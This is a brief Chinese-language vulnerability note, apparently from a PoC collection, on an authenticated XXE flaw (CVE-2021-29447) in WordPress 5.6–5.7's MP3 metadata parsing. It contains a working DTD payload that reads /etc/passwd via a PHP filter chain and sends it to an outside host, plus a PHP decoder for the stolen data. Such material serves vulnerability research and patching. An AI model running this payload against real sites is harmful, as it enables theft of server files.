WordPress 5.6-5.7-经过身份验证的XXE(CVE-2021-29447).md
800 B / 2021-05-21 09:14:38
# WordPress 5.6-5.7-经过身份验证的XXE(CVE-2021-29447)
能够上传文件的用户(例如Author)可以利用媒体库中的XML解析问题来导致XXE攻击。WordPress使用了一个名为ID3的MP3解析库,该库受到XML外部实体(XXE)漏洞的影响,该漏洞会影响PHP 8及更高版本。
PoC:
```xml
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd">
<!ENTITY % init "<!ENTITY % trick SYSTEM 'http://host.docker.internal:8001/?p=%file;'>" >
```
decryption.php:
```php
<?php
echo zlib_decode(base64_decode(''));
```
参考:https://github.com/motikan2010/CVE-2021-29447
ref:
* https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5
* https://core.trac.wordpress.org/changeset/29378